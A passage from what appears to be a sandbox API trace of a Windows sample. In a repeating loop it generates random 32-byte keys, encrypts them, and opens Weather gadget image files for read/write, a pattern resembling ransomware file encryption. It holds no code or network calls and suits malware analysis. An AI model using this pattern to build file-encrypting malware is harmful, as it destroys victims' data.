dwFlags=0x0, lpMem=0x2f3ebc8 | out: hHeap=0x2c0000) returned 1 [0160.700] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9c8 | out: pbBuffer=0x248e9c8) returned 1 [0160.700] GetProcessHeap () returned 0x2c0000 [0160.700] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.700] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9c0*=0x30) returned 1 [0160.700] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-last-quarter.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-last-quarter.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.709] GetProcessHeap () returned 0x2c0000 [0160.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.709] GetProcessHeap () returned 0x2c0000 [0160.709] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83fd8 | out: hHeap=0x2c0000) returned 1 [0160.709] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9c8 | out: pbBuffer=0x248e9c8) returned 1 [0160.709] GetProcessHeap () returned 0x2c0000 [0160.709] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.709] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9c0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9c0*=0x30) returned 1 [0160.709] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_moon-first-quarter.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_moon-first-quarter.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.716] GetProcessHeap () returned 0x2c0000 [0160.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.716] GetProcessHeap () returned 0x2c0000 [0160.716] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c83eb0 | out: hHeap=0x2c0000) returned 1 [0160.716] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9c0 | out: pbBuffer=0x248e9c0) returned 1 [0160.716] GetProcessHeap () returned 0x2c0000 [0160.716] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.716] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9b8*=0x30) returned 1 [0160.716] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\docked_black_cloudy.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\docked_black_cloudy.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.718] GetProcessHeap () returned 0x2c0000 [0160.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.718] GetProcessHeap () returned 0x2c0000 [0160.718] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3e880 | out: hHeap=0x2c0000) returned 1 [0160.718] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9c0 | out: pbBuffer=0x248e9c0) returned 1 [0160.718] GetProcessHeap () returned 0x2c0000 [0160.718] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.718] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9b8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9b8*=0x30) returned 1 [0160.718] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\divider-vertical.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\divider-vertical.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.720] GetProcessHeap () returned 0x2c0000 [0160.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.720] GetProcessHeap () returned 0x2c0000 [0160.720] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41778 | out: hHeap=0x2c0000) returned 1 [0160.720] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9b8 | out: pbBuffer=0x248e9b8) returned 1 [0160.720] GetProcessHeap () returned 0x2c0000 [0160.720] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.721] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9b0*=0x30) returned 1 [0160.721] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up_BIDI.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up_bidi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.722] GetProcessHeap () returned 0x2c0000 [0160.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.722] GetProcessHeap () returned 0x2c0000 [0160.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f41568 | out: hHeap=0x2c0000) returned 1 [0160.722] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9b8 | out: pbBuffer=0x248e9b8) returned 1 [0160.722] GetProcessHeap () returned 0x2c0000 [0160.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.722] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9b0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9b0*=0x30) returned 1 [0160.722] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_up.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_up.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.722] GetProcessHeap () returned 0x2c0000 [0160.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.722] GetProcessHeap () returned 0x2c0000 [0160.722] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f44028 | out: hHeap=0x2c0000) returned 1 [0160.722] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9b0 | out: pbBuffer=0x248e9b0) returned 1 [0160.722] GetProcessHeap () returned 0x2c0000 [0160.723] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.723] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9a8*=0x30) returned 1 [0160.723] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_over_BIDI.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_over_bidi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.724] GetProcessHeap () returned 0x2c0000 [0160.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.724] GetProcessHeap () returned 0x2c0000 [0160.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3e768 | out: hHeap=0x2c0000) returned 1 [0160.724] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9b0 | out: pbBuffer=0x248e9b0) returned 1 [0160.724] GetProcessHeap () returned 0x2c0000 [0160.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.724] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9a8*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9a8*=0x30) returned 1 [0160.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_search_down_BIDI.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_search_down_bidi.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.726] GetProcessHeap () returned 0x2c0000 [0160.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.726] GetProcessHeap () returned 0x2c0000 [0160.726] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f3e650 | out: hHeap=0x2c0000) returned 1 [0160.727] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9a8 | out: pbBuffer=0x248e9a8) returned 1 [0160.727] GetProcessHeap () returned 0x2c0000 [0160.727] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.727] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9a0*=0x30) returned 1 [0160.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\btn_close_over.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\btn_close_over.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.732] GetProcessHeap () returned 0x2c0000 [0160.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.732] GetProcessHeap () returned 0x2c0000 [0160.732] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f43e28 | out: hHeap=0x2c0000) returned 1 [0160.732] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9a8 | out: pbBuffer=0x248e9a8) returned 1 [0160.733] GetProcessHeap () returned 0x2c0000 [0160.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.733] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e9a0*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e9a0*=0x30) returned 1 [0160.733] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\alertIcon.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\alerticon.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.740] GetProcessHeap () returned 0x2c0000 [0160.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.740] GetProcessHeap () returned 0x2c0000 [0160.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f38b60 | out: hHeap=0x2c0000) returned 1 [0160.740] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9a0 | out: pbBuffer=0x248e9a0) returned 1 [0160.740] GetProcessHeap () returned 0x2c0000 [0160.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.740] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e998*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e998*=0x30) returned 1 [0160.740] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\8.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\8.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.753] GetProcessHeap () returned 0x2c0000 [0160.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.753] GetProcessHeap () returned 0x2c0000 [0160.753] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eef178 | out: hHeap=0x2c0000) returned 1 [0160.753] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e9a0 | out: pbBuffer=0x248e9a0) returned 1 [0160.753] GetProcessHeap () returned 0x2c0000 [0160.753] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.753] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e998*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e998*=0x30) returned 1 [0160.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\47.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\47.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.754] GetProcessHeap () returned 0x2c0000 [0160.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.754] GetProcessHeap () returned 0x2c0000 [0160.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeedd8 | out: hHeap=0x2c0000) returned 1 [0160.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e998 | out: pbBuffer=0x248e998) returned 1 [0160.754] GetProcessHeap () returned 0x2c0000 [0160.754] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.754] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e990*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e990*=0x30) returned 1 [0160.754] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\46.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\46.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.754] GetProcessHeap () returned 0x2c0000 [0160.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.754] GetProcessHeap () returned 0x2c0000 [0160.754] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeecf0 | out: hHeap=0x2c0000) returned 1 [0160.754] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e998 | out: pbBuffer=0x248e998) returned 1 [0160.754] GetProcessHeap () returned 0x2c0000 [0160.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.755] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e990*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e990*=0x30) returned 1 [0160.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\45.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\45.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.755] GetProcessHeap () returned 0x2c0000 [0160.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.755] GetProcessHeap () returned 0x2c0000 [0160.755] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeec08 | out: hHeap=0x2c0000) returned 1 [0160.755] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e990 | out: pbBuffer=0x248e990) returned 1 [0160.755] GetProcessHeap () returned 0x2c0000 [0160.755] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.755] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e988*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e988*=0x30) returned 1 [0160.755] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\44.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\44.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.762] GetProcessHeap () returned 0x2c0000 [0160.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.762] GetProcessHeap () returned 0x2c0000 [0160.762] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eeeb20 | out: hHeap=0x2c0000) returned 1 [0160.762] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e990 | out: pbBuffer=0x248e990) returned 1 [0160.762] GetProcessHeap () returned 0x2c0000 [0160.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.762] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e988*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e988*=0x30) returned 1 [0160.762] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\42.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\42.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.780] GetProcessHeap () returned 0x2c0000 [0160.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.781] GetProcessHeap () returned 0x2c0000 [0160.781] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee950 | out: hHeap=0x2c0000) returned 1 [0160.781] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e988 | out: pbBuffer=0x248e988) returned 1 [0160.781] GetProcessHeap () returned 0x2c0000 [0160.781] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.781] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e980*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e980*=0x30) returned 1 [0160.781] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\36.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\36.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.785] GetProcessHeap () returned 0x2c0000 [0160.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.785] GetProcessHeap () returned 0x2c0000 [0160.785] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eee2f8 | out: hHeap=0x2c0000) returned 1 [0160.785] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e988 | out: pbBuffer=0x248e988) returned 1 [0160.785] GetProcessHeap () returned 0x2c0000 [0160.785] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.785] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e980*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e980*=0x30) returned 1 [0160.785] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\31.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\31.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.786] GetProcessHeap () returned 0x2c0000 [0160.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.786] GetProcessHeap () returned 0x2c0000 [0160.786] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eede70 | out: hHeap=0x2c0000) returned 1 [0160.786] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e980 | out: pbBuffer=0x248e980) returned 1 [0160.786] GetProcessHeap () returned 0x2c0000 [0160.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.786] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e978*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e978*=0x30) returned 1 [0160.786] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\30.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\30.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.787] GetProcessHeap () returned 0x2c0000 [0160.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.787] GetProcessHeap () returned 0x2c0000 [0160.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eedd88 | out: hHeap=0x2c0000) returned 1 [0160.787] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e980 | out: pbBuffer=0x248e980) returned 1 [0160.787] GetProcessHeap () returned 0x2c0000 [0160.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.787] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e978*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e978*=0x30) returned 1 [0160.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\3.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\3.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.787] GetProcessHeap () returned 0x2c0000 [0160.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.787] GetProcessHeap () returned 0x2c0000 [0160.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eedca0 | out: hHeap=0x2c0000) returned 1 [0160.787] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e978 | out: pbBuffer=0x248e978) returned 1 [0160.787] GetProcessHeap () returned 0x2c0000 [0160.787] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.787] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e970*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e970*=0x30) returned 1 [0160.787] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Windows Sidebar\\Gadgets\\Weather.Gadget\\images\\29.png" (normalized: "c:\\program files (x86)\\windows sidebar\\gadgets\\weather.gadget\\images\\29.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0160.791] GetProcessHeap () returned 0x2c0000 [0160.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f278 | out: hHeap=0x2c0000) returned 1 [0160.791] GetProcessHeap () returned 0x2c0000 [0160.791] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eedbb8 | out: hHeap=0x2c0000) returned 1 [0160.791] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248e978 | out: pbBuffer=0x248e978) returned 1 [0160.791] GetProcessHeap () returned 0x2c0000 [0160.791] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f278 [0160.791] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f278*, pdwDataLen=0x248e970*=0x20, dwBufLen=0x30 | out: pbData=0x31f278*, pdwDataLen=0x248e970*=0x30) returned 1 [0160.791] CreateFileW 